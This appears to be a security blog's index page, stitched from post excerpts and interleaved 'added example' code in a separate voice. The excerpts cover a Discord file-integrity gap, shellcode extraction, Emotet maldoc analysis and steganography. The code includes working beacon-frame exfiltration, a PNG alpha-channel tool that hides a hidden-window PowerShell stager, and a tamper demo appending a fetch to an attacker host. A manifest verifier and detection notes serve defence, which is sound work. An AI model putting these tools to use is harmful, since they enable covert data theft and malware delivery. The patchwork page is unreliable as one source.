I found this bug a while ago. It requires initial access, so it is useful for post-exploitation rather than as a way in. Discord keeps a SQLite database called installer.db that stores SHA-256 hashes of every file Discord uses, but it turns out that the integrity of some files is never checked, which lets an attacker modify some of the JS files Discord loads. An attacker who already has a shell or comparable access to the machine can modify those files. The attacker can modify the JS files to download and…
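The check a hash manifest like installer.db is supposed to enable, as an added example (not Discord's code or the post's): walk an install directory against a SQLite table of SHA-256 hashes and report the two things that matter for this bug, entries whose hash changed and files on disk that the manifest never covers. The `files(path, sha256)` table layout, the `app/*.js` paths and the appended `fetch()` line are constructed for the example; the real installer.db schema is not reproduced here.

```python
"""Verify a directory tree against a SQLite manifest of SHA-256 hashes.

The table layout files(path TEXT, sha256 TEXT) is an assumption for this
example and is NOT the real installer.db schema. All files and contents
are constructed.
"""
import hashlib
import os
import sqlite3
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(db, root, rel_paths):
    """Record the current hash of each listed file (the install-time state)."""
    db.execute("CREATE TABLE IF NOT EXISTS files (path TEXT PRIMARY KEY, sha256 TEXT NOT NULL)")
    for rel in rel_paths:
        db.execute("INSERT OR REPLACE INTO files VALUES (?, ?)",
                   (rel, sha256_file(os.path.join(root, rel))))
    db.commit()


def verify_tree(db, root):
    """Return (modified, unlisted): manifest entries whose hash changed, and
    files under root that the manifest never covers, so nothing checks them."""
    listed = dict(db.execute("SELECT path, sha256 FROM files"))
    modified, unlisted = [], []
    for dirpath, _, names in os.walk(root):
        for name in names:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            if rel not in listed:
                unlisted.append(rel)
            elif sha256_file(os.path.join(root, rel)) != listed[rel]:
                modified.append(rel)
    return sorted(modified), sorted(unlisted)


def demo():
    """Constructed scenario: an install with two JS files, only one of them
    hashed, then an attacker with file-system access appends to both."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "app"))
    for rel, body in (("app/checked.js", b"console.log('checked');\n"),
                      ("app/unchecked.js", b"console.log('unchecked');\n")):
        with open(os.path.join(root, rel), "wb") as f:
            f.write(body)
    db = sqlite3.connect(":memory:")
    build_manifest(db, root, ["app/checked.js"])   # unchecked.js is never hashed
    for rel in ("app/checked.js", "app/unchecked.js"):   # post-exploitation tampering
        with open(os.path.join(root, rel), "ab") as f:
            f.write(b"fetch('https://attacker.invalid/stage2');\n")
    return verify_tree(db, root)


if __name__ == "__main__":
    modified, unlisted = demo()
    print("modified:", modified)
    print("never checked:", unlisted)
```

The second list is the interesting one for a defender: a manifest only protects what it enumerates, so the audit has to enumerate the tree, not the manifest.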


Malware will sometimes run shellcode directly in memory. The common method is to first call VirtualAlloc to allocate memory with the right permissions (PAGE_EXECUTE_READWRITE), then use RtlMoveMemory to copy the shellcode into the allocated region, and finally call CreateThread to pass control to that address.

A simple program to do that

To extract the shellcode we can use API hooks: set a breakpoint on any of those API calls. I will use x64dbg, but any other debugger will do. Load the executable into x64dbg and go to Symbols …


I am writing this blog in the hope that I will get hired by some gentleman/woman. I have been trying to get a job in IT but can't seem to impress. I have done enough projects, which gave me enough confidence that I can make anything. I like to make things that break things, if that makes sense, so my dream job would be researching and making exploits, tools, security tools, and malware for red teams to use in pentests, etc. But I am OK with any job that lets my inner researcher out. …


Beacon frame: here is the Wikipedia definition. A beacon frame is one of the management frames in IEEE 802.11-based WLANs. It contains all the information about the network. Beacon frames are transmitted periodically; they serve to announce the presence of a wireless LAN and to synchronise the members of the service set.

How does this method work?

This method uses Scapy to generate beacon frames. The SSID field is used to carry the data. Suppose you have a file. The program takes the first ten bytes of the file and transmits them in…
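Both sides of the exchange described above, as an added example written for this page (not the post's Scapy script): the sender packs ten-byte chunks of a file into the SSID element of raw 802.11 beacon frames, and the receiver filters, reorders and reassembles them. The frames are built with `struct` rather than Scapy so the example runs offline; the bytes match what `Dot11()/Dot11Beacon()/Dot11Elt(ID=0)` would produce, and `RadioTap()/sendp()` would be used to put them on the air. Using the 12-bit 802.11 sequence number to order chunks and an empty SSID as the end-of-file marker are choices made for this example; the BSSID and the "file" are constructed.

```python
"""Beacon-frame exfiltration: encoder and decoder (added example)."""
import struct

CHUNK = 10                                         # payload bytes per beacon, as in the post
BSSID = bytes.fromhex("02c0ffee0001")              # locally administered MAC, constructed
BROADCAST = b"\xff" * 6


def beacon(ssid_bytes, seq, bssid=BSSID):
    """Management frame, type 0 subtype 8 (beacon): MAC header + fixed fields + SSID IE."""
    frame_control = struct.pack("<H", 0x0080)       # subtype 8, type 0, no flags
    duration = b"\x00\x00"
    seq_ctrl = struct.pack("<H", (seq & 0x0FFF) << 4)   # fragment 0, 12-bit sequence number
    header = frame_control + duration + BROADCAST + bssid + bssid + seq_ctrl   # 24 bytes
    fixed = struct.pack("<QHH", 0, 100, 0x0411)     # timestamp, 100 TU interval, ESS+privacy+short slot
    ssid_ie = bytes([0, len(ssid_bytes)]) + ssid_bytes   # element ID 0 = SSID, at most 32 bytes
    return header + fixed + ssid_ie


def encode_file(data):
    """One beacon per CHUNK bytes, then an empty-SSID beacon as end marker."""
    frames = [beacon(data[i:i + CHUNK], n) for n, i in enumerate(range(0, len(data), CHUNK))]
    frames.append(beacon(b"", len(frames)))
    return frames


def parse_beacon(frame, bssid=BSSID):
    """Return (seq, ssid_bytes), or None if this is not a beacon from our BSSID."""
    if len(frame) < 38 or frame[0] != 0x80 or frame[16:22] != bssid:
        return None
    seq = struct.unpack("<H", frame[22:24])[0] >> 4
    pos = 36                                        # 24-byte header + 12 bytes of fixed fields
    while pos + 2 <= len(frame):                    # walk the tagged parameters
        elt_id, length = frame[pos], frame[pos + 1]
        if elt_id == 0:
            return seq, frame[pos + 2:pos + 2 + length]
        pos += 2 + length
    return None


def decode_file(frames):
    """Reassemble captured frames in any order; None until every chunk and the end marker are seen."""
    chunks, end = {}, None
    for frame in frames:
        parsed = parse_beacon(frame)
        if parsed is None:
            continue
        seq, ssid = parsed
        if ssid == b"":
            end = seq
        else:
            chunks[seq] = ssid
    if end is None or any(i not in chunks for i in range(end)):
        return None
    return b"".join(chunks[i] for i in range(end))


if __name__ == "__main__":
    sample = b"secret.txt: the quick brown fox jumps over the lazy dog"   # constructed file
    captured = encode_file(sample)[::-1]            # pretend the sniffer saw them out of order
    print(decode_file(captured))
```

On the detection side the same parser is the starting point: a BSSID whose SSID changes on every beacon, with high-entropy or non-printable bytes in it, is the signature of this channel, and the 12-bit sequence counter wrapping every 4096 frames bounds how much a single pass can carry before the receiver must resynchronise.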


I have been analysing maldocs for a few days. I analysed two variants of Emotet but will write about only one of them. This is a static analysis. First download the samples from here: https://github.com/jstrosch/malware-samples/blob/master/maldocs/emotet/2020/January/samples.zip

I dumped the macros using oledump.

The streams marked M/m contain macros (oledump flags a stream with M when it holds VBA macro code and with m when the macro stream contains only Attribute lines and no code). I then dumped stream 16 with the command “oledump.py -s 16 -v file”, where -v decompresses the VBA source. Next I checked the entry point


Since you are here, I am going to assume that you know the basics of syscalls and how to call them, as well as how to assemble and link assembly files. You may ask: why assembly? There are two reasons. My life was boring, so it gave my brain something to work on. The second reason is that we get absolute control over the code and the result is really small. Even a simple C program runs many other functions before main() is reached. Although it does not affect our…


My friend works for a company. Let's call the company X. I can't post screenshots here as I was not allowed to take any. This incident happened 5–6 months ago, so my memories are quite vague. He called me and asked how to handle the malware. The malware was exfiltrating data at very high speeds since the servers had high-speed internet. I asked him to let me work on this as that thing was really exciting. He gave me the creds of the Proxmox admin panel after asking for permission …


I recently came across PowerShell malware that used steganography and living-off-the-land techniques. It was cool, so I decided to make a similar PoC in Python. Let's clear up the basics first. I will use a PNG image. An RGBA PNG has three colour channels (RGB) and an alpha channel for transparency. I won't touch the RGB channels; I will modify the alpha channel to hide the payload.

  1. First let's find an image with an alpha channel. I will use an image that Blender rendered. Blender renders by default contain…
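The alpha-channel hiding described above, carried through end to end as an added example written for this page (not the post's PoC): a payload is written one bit per pixel into the least significant bit of each alpha value, leaving RGB untouched, and recovered from the re-read PNG. A tiny PNG writer and reader (8-bit RGBA, filter type 0) are included so it runs without Pillow; the 64x64 fully opaque cover (like the foreground of a Blender render) and the PowerShell one-liner used as payload are constructed.

```python
"""LSB steganography in the alpha channel of an RGBA PNG (added example)."""
import struct
import zlib

SIGNATURE = b"\x89PNG\r\n\x1a\n"
PAYLOAD = b"powershell -nop -w hidden -c \"Write-Output hypothetical\""   # constructed stage


def _chunk(kind, data):
    body = kind + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def write_png(width, height, rgba):
    """Encode raw RGBA bytes as a PNG using the 'None' filter on every scanline."""
    stride = width * 4
    raw = b"".join(b"\x00" + bytes(rgba[y * stride:(y + 1) * stride]) for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)   # 8-bit, colour type 6 = RGBA
    return SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(png):
    """Decode the PNG subset write_png produces; returns (width, height, bytearray of RGBA)."""
    if png[:8] != SIGNATURE:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos < len(png):
        length, kind = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        if kind == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", data[:10])
            if (depth, ctype) != (8, 6):
                raise ValueError("example only handles 8-bit RGBA")
        elif kind == b"IDAT":
            idat += data
        elif kind == b"IEND":
            break
        pos += 12 + length                           # length + type + data + crc
    raw, stride, out = zlib.decompress(idat), width * 4, bytearray()
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("example only handles filter type 0")
        out += row[1:]
    return width, height, out


def embed_alpha(rgba, payload):
    """Write a 32-bit length then the payload into alpha LSBs, one bit per pixel."""
    rgba = bytearray(rgba)
    bits = struct.pack(">I", len(payload)) + payload
    if len(bits) * 8 > len(rgba) // 4:
        raise ValueError("payload too large for this cover image")
    for i in range(len(bits) * 8):
        bit = (bits[i // 8] >> (7 - i % 8)) & 1
        rgba[4 * i + 3] = (rgba[4 * i + 3] & 0xFE) | bit   # RGB untouched; alpha moves by at most 1
    return rgba


def _read_bits(rgba, start_bit, count):
    out = bytearray(count // 8)
    for i in range(count):
        out[i // 8] = (out[i // 8] << 1) | (rgba[4 * (start_bit + i) + 3] & 1)
    return bytes(out)


def extract_alpha(rgba):
    length = struct.unpack(">I", _read_bits(rgba, 0, 32))[0]
    return _read_bits(rgba, 32, length * 8)


def demo():
    """Round trip through a real PNG file: opaque 64x64 cover, payload hidden, image re-read."""
    width = height = 64
    cover = bytearray(b"\x30\x60\x90\xff" * (width * height))    # constructed: opaque, bluish
    stego_png = write_png(width, height, embed_alpha(cover, PAYLOAD))
    _, _, pixels = read_png(stego_png)
    return extract_alpha(pixels)


if __name__ == "__main__":
    print(demo())
```

One caveat worth knowing before reusing this: a render whose alpha was exactly 255 everywhere now has a run of 254s in the top rows, which is a trivial statistical tell. Embedding only where the alpha channel already varies (anti-aliased edges, semi-transparent materials) costs capacity but removes that tell.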

Disclaimer: I am not an Android developer and I hate Java, so I don't know much about the code. So if I make any mistake, please correct me. Now let's get started.

My friend received a message with a shortened link that points to a GitHub website. This website keeps changing, but here is the shortened URL.

If you are from India then you may know that some state governments provide laptops to high-school students. …


I wrote a Python program that runs in the background and periodically checks for newly inserted USB pendrives. The pendrive holds a private key that the program checks and verifies against its public key. If it matches, the program decrypts your files. The files are encrypted with AES, so you can't decrypt them without the right pendrive. Here is how it works.

  1. The program has a setup mode that you run with the argument “--setup”. In this mode the program generates the private and public keys. It will…
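The two checks the program above relies on, written out as an added example for this page (not the post's program): spotting a newly attached volume by diffing the set of mount points between polls, and proving that the key file on the pendrive really is the private half of the public key embedded in the program by having it sign a fresh random challenge. The RSA here is textbook RSA with fixed primes so the example is self-contained; it is not secure, and a real tool would use a library such as `cryptography` (which would also provide the AES file decryption that is omitted here). The mount paths, the `unlock.key` file name and the key values are constructed.

```python
"""Pendrive-as-key: new-mount detection plus challenge-response key check (added example).

The RSA parameters are a constructed toy (two Mersenne primes); never use them for
anything real. The file layout on the drive (a single 'unlock.key' holding the
private exponent) is an assumption made for this example.
"""
import hashlib
import os
import secrets
import tempfile

P, Q, E = 2**31 - 1, 2**61 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))      # private exponent (Python >= 3.8 for pow(x, -1, m))
PUBLIC_KEY = (N, E)                     # this is what the background program embeds


def _digest_int(data):
    return int.from_bytes(hashlib.sha256(data).digest()[:11], "big")   # 88 bits, below N (~2^92)


def sign(private_d, n, challenge):
    return pow(_digest_int(challenge), private_d, n)


def verify(public_key, challenge, signature):
    n, e = public_key
    return pow(signature, e, n) == _digest_int(challenge)


def key_on_drive_is_ours(mount_point, public_key, key_name="unlock.key"):
    """True only if the drive holds a private exponent matching our public key."""
    path = os.path.join(mount_point, key_name)
    if not os.path.isfile(path):
        return False
    try:
        with open(path) as f:
            private_d = int(f.read().strip())
    except ValueError:
        return False
    challenge = secrets.token_bytes(32)     # fresh every time: a replayed signature proves nothing
    return verify(public_key, challenge, sign(private_d, public_key[0], challenge))


def new_mounts(previous, current):
    """Mount points that appeared since the last poll; the background loop acts on these."""
    return sorted(set(current) - set(previous))


def demo():
    """Constructed: one 'drive' with the right key, one with a wrong key, one with none."""
    good, bad, empty = (tempfile.mkdtemp() for _ in range(3))
    with open(os.path.join(good, "unlock.key"), "w") as f:
        f.write(str(D))
    with open(os.path.join(bad, "unlock.key"), "w") as f:
        f.write(str(D + 2))
    appeared = new_mounts(["/"], ["/", good, bad, empty])
    return (appeared == sorted([good, bad, empty]),
            [key_on_drive_is_ours(m, PUBLIC_KEY) for m in (good, bad, empty)])


if __name__ == "__main__":
    print(demo())
```

The point of the challenge is that "verifies with its public key" should never be a byte comparison of the key file: a copied key file passes that, whereas only the holder of the private half can answer a challenge it has not seen before. In a real implementation the file key for the AES-encrypted data would then be unwrapped with the same private key rather than stored alongside it.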

Debabrata

I am a hacker and ex-web developer. I sometimes work as a freelance dev/hacker. Sometimes I hunt bugs.
